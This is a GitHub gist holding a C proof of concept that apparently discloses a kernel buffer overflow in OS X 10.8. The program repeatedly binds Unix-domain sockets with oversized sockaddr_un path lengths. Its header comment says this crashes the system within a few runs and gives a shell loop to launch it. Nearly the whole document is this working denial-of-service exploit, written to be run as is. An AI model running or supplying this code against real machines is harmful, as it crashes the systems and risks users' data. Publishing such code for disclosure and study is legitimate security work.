-
-
Save bnoordhuis/8882643 to your computer and use it in GitHub Desktop.
PoC of OS X sockaddr_un system crash
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Crashes OS X 10.8, `cc un.c && while :; do ./a.out ; done` to run. | |
| // The buffer overflow usually gets triggered within the first three | |
| // or four runs. Make sure you back up your data first! | |
| #include <assert.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <errno.h> | |
| #include <sys/socket.h> | |
| #include <sys/un.h> | |
| #include <unistd.h> | |
| int main(void) { | |
| struct sockaddr_un *s; | |
| char buf[1024]; | |
| size_t len; | |
| int fd; | |
| int rc; | |
| memset(buf, 'a', sizeof(buf)); | |
| s = (struct sockaddr_un *) buf; | |
| s->sun_family = AF_UNIX; | |
| for (len = sizeof(*s); len < sizeof(buf); len += 1) { | |
| fd = socket(AF_UNIX, SOCK_STREAM, 0); | |
| assert(fd >= 0); | |
| rc = bind(fd, (struct sockaddr *) s, len); | |
| close(fd); | |
| if (rc) { | |
| perror("bind"); | |
| printf("len=%zu\n", len); | |
| break; | |
| } | |
| buf[len] = 0; | |
| unlink(s->sun_path); | |
| buf[len] = 'a'; | |
| } | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment